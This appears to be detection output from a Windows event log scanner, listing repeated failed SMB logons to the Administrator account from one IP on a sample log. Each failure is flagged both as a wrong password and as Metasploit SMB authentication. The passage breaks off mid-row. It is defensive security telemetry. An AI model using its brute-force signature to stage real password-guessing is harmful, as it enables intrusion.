Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 